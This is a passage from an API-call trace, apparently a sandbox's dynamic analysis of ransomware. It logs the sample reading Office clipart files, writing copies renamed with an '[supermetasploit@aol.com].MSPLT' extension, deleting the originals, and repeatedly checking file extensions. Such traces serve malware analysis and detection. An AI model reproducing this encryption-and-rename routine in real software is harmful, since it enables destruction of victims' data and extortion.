hTemplateFile=0x0) returned 0x434 [0290.424] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0290.424] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0290.424] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00015_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0290.425] GetLastError () returned 0x0 [0290.426] ReadFile (in: hFile=0x434, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x127e, lpOverlapped=0x0) returned 1 [0290.428] WriteFile (in: hFile=0x460, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0x1280, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0x1280, lpOverlapped=0x0) returned 1 [0290.429] ReadFile (in: hFile=0x434, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0290.429] WriteFile (in: hFile=0x460, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0290.430] SetEndOfFile (hFile=0x460) returned 1 [0290.430] CloseHandle (hObject=0x460) returned 1 [0290.432] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0290.432] SetEndOfFile (hFile=0x434) returned 1 [0290.435] CloseHandle (hObject=0x434) returned 1 [0290.435] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0290.436] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00015_.wmf")) returned 1 [0290.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0290.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0290.436] lstrlenW (lpString=".doc") returned 4 [0290.436] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0290.436] lstrlenW (lpString=".docx") returned 5 [0290.436] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0290.436] lstrlenW (lpString=".pdf") returned 4 [0290.437] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0290.437] lstrlenW (lpString=".xls") returned 4 [0290.437] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0290.437] lstrlenW (lpString=".xlsx") returned 5 [0290.437] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0290.437] lstrlenW (lpString=".ppt") returned 4 [0290.437] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0290.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0290.437] lstrlenW (lpString=".zip") returned 4 [0290.437] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0290.437] lstrlenW (lpString=".rar") returned 4 [0290.437] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0290.437] lstrlenW (lpString=".bz2") returned 4 [0290.437] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0290.437] lstrlenW (lpString=".7z") returned 3 [0290.437] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0290.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0290.437] lstrlenW (lpString=".dbf") returned 4 [0290.437] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0290.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0290.437] lstrlenW (lpString=".1cd") returned 4 [0290.437] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0290.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0290.437] lstrlenW (lpString=".jpg") returned 4 [0290.437] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0290.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0290.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0290.437] lstrlenW (lpString=".doc") returned 4 [0290.437] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0290.438] lstrlenW (lpString=".docx") returned 5 [0290.438] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0290.438] lstrlenW (lpString=".pdf") returned 4 [0290.438] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0290.438] lstrlenW (lpString=".xls") returned 4 [0290.438] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0290.438] lstrlenW (lpString=".xlsx") returned 5 [0290.438] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0290.438] lstrlenW (lpString=".ppt") returned 4 [0290.438] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0290.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0290.438] lstrlenW (lpString=".zip") returned 4 [0290.438] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0290.438] lstrlenW (lpString=".rar") returned 4 [0290.438] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0290.438] lstrlenW (lpString=".bz2") returned 4 [0290.438] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0290.438] lstrlenW (lpString=".7z") returned 3 [0290.438] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0290.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0290.438] lstrlenW (lpString=".dbf") returned 4 [0290.438] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0290.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0290.438] lstrlenW (lpString=".1cd") returned 4 [0290.438] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0290.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0290.438] lstrlenW (lpString=".jpg") returned 4 [0290.438] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0290.439] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0290.439] lstrlenW (lpString="AN00932_.WMF") returned 12 [0290.439] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00932_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0290.439] GetFileSizeEx (in: hFile=0x434, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=14428) returned 1 [0290.439] CloseHandle (hObject=0x434) returned 1 [0290.439] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00932_.wmf")) returned 0x220 [0290.439] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00932_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0290.440] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00932_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0290.440] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0290.440] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0290.440] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00932_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0290.441] GetLastError () returned 0x0 [0290.441] ReadFile (in: hFile=0x434, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x385c, lpOverlapped=0x0) returned 1 [0290.445] WriteFile (in: hFile=0x460, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0x3860, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0x3860, lpOverlapped=0x0) returned 1 [0290.446] ReadFile (in: hFile=0x434, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0290.446] WriteFile (in: hFile=0x460, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0290.446] SetEndOfFile (hFile=0x460) returned 1 [0290.451] CloseHandle (hObject=0x460) returned 1 [0290.456] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0290.456] SetEndOfFile (hFile=0x434) returned 1 [0290.692] CloseHandle (hObject=0x434) returned 1 [0290.692] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0290.973] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00932_.wmf")) returned 1 [0291.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 68 [0291.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 68 [0291.350] lstrlenW (lpString=".doc") returned 4 [0291.350] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0291.350] lstrlenW (lpString=".docx") returned 5 [0291.350] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0291.350] lstrlenW (lpString=".pdf") returned 4 [0291.350] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0291.350] lstrlenW (lpString=".xls") returned 4 [0291.350] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0291.350] lstrlenW (lpString=".xlsx") returned 5 [0291.350] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0291.350] lstrlenW (lpString=".ppt") returned 4 [0291.350] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0291.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 68 [0291.350] lstrlenW (lpString=".zip") returned 4 [0291.350] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0291.351] lstrlenW (lpString=".rar") returned 4 [0291.351] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0291.351] lstrlenW (lpString=".bz2") returned 4 [0291.351] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0291.351] lstrlenW (lpString=".7z") returned 3 [0291.351] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0291.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 68 [0291.351] lstrlenW (lpString=".dbf") returned 4 [0291.351] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0291.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 68 [0291.351] lstrlenW (lpString=".1cd") returned 4 [0291.351] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0291.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 68 [0291.351] lstrlenW (lpString=".jpg") returned 4 [0291.351] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0291.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 68 [0291.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 68 [0291.351] lstrlenW (lpString=".doc") returned 4 [0291.352] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0291.352] lstrlenW (lpString=".docx") returned 5 [0291.352] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0291.352] lstrlenW (lpString=".pdf") returned 4 [0291.352] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0291.352] lstrlenW (lpString=".xls") returned 4 [0291.352] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0291.352] lstrlenW (lpString=".xlsx") returned 5 [0291.352] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0291.352] lstrlenW (lpString=".ppt") returned 4 [0291.352] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0291.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 68 [0291.352] lstrlenW (lpString=".zip") returned 4 [0291.352] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0291.352] lstrlenW (lpString=".rar") returned 4 [0291.352] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0291.359] lstrlenW (lpString=".bz2") returned 4 [0291.359] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0291.359] lstrlenW (lpString=".7z") returned 3 [0291.360] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0291.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 68 [0291.360] lstrlenW (lpString=".dbf") returned 4 [0291.360] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0291.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 68 [0291.360] lstrlenW (lpString=".1cd") returned 4 [0291.360] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0291.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 68 [0291.360] lstrlenW (lpString=".jpg") returned 4 [0291.360] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0291.360] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0291.360] lstrlenW (lpString="AN01044_.WMF") returned 12 [0291.360] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01044_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0292.573] GetFileSizeEx (in: hFile=0x484, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=1596) returned 1 [0292.573] CloseHandle (hObject=0x484) returned 1 [0292.573] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01044_.wmf")) returned 0x220 [0292.573] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01044_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0292.574] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01044_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0292.574] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.574] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.574] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01044_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0292.624] GetLastError () returned 0x0 [0292.624] ReadFile (in: hFile=0x484, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x63c, lpOverlapped=0x0) returned 1 [0292.690] WriteFile (in: hFile=0x488, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0x640, lpOverlapped=0x0) returned 1 [0292.692] ReadFile (in: hFile=0x484, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0292.692] WriteFile (in: hFile=0x488, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0292.692] SetEndOfFile (hFile=0x488) returned 1 [0292.749] CloseHandle (hObject=0x488) returned 1 [0292.764] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.764] SetEndOfFile (hFile=0x484) returned 1 [0292.797] CloseHandle (hObject=0x484) returned 1 [0292.797] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0292.806] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01044_.wmf")) returned 1 [0292.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 68 [0292.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 68 [0292.817] lstrlenW (lpString=".doc") returned 4 [0292.817] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0292.817] lstrlenW (lpString=".docx") returned 5 [0292.817] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0292.817] lstrlenW (lpString=".pdf") returned 4 [0292.817] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0292.817] lstrlenW (lpString=".xls") returned 4 [0292.817] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0292.817] lstrlenW (lpString=".xlsx") returned 5 [0292.817] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0292.817] lstrlenW (lpString=".ppt") returned 4 [0292.817] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0292.817] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 68 [0292.817] lstrlenW (lpString=".zip") returned 4 [0292.817] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0292.817] lstrlenW (lpString=".rar") returned 4 [0292.817] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0292.817] lstrlenW (lpString=".bz2") returned 4 [0292.817] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0292.817] lstrlenW (lpString=".7z") returned 3 [0292.817] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0292.817] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 68 [0292.817] lstrlenW (lpString=".dbf") returned 4 [0292.818] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0292.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 68 [0292.818] lstrlenW (lpString=".1cd") returned 4 [0292.818] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0292.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 68 [0292.818] lstrlenW (lpString=".jpg") returned 4 [0292.818] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0292.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 68 [0292.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 68 [0292.818] lstrlenW (lpString=".doc") returned 4 [0292.818] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0292.818] lstrlenW (lpString=".docx") returned 5 [0292.818] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0292.818] lstrlenW (lpString=".pdf") returned 4 [0292.818] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0292.818] lstrlenW (lpString=".xls") returned 4 [0292.818] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0292.818] lstrlenW (lpString=".xlsx") returned 5 [0292.819] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0292.819] lstrlenW (lpString=".ppt") returned 4 [0292.819] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0292.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 68 [0292.819] lstrlenW (lpString=".zip") returned 4 [0292.819] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0292.819] lstrlenW (lpString=".rar") returned 4 [0292.819] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0292.819] lstrlenW (lpString=".bz2") returned 4 [0292.819] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0292.819] lstrlenW (lpString=".7z") returned 3 [0292.819] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0292.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 68 [0292.819] lstrlenW (lpString=".dbf") returned 4 [0292.819] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0292.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 68 [0292.819] lstrlenW (lpString=".1cd") returned 4 [0292.819] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0292.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 68 [0292.819] lstrlenW (lpString=".jpg") returned 4 [0292.819] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0292.819] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0292.820] lstrlenW (lpString="AN01218_.WMF") returned 12 [0292.820] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01218_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0292.820] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=3012) returned 1 [0292.821] CloseHandle (hObject=0x46c) returned 1 [0292.821] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01218_.wmf")) returned 0x220 [0292.821] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01218_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0292.821] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01218_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0292.821] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.822] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.822] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft 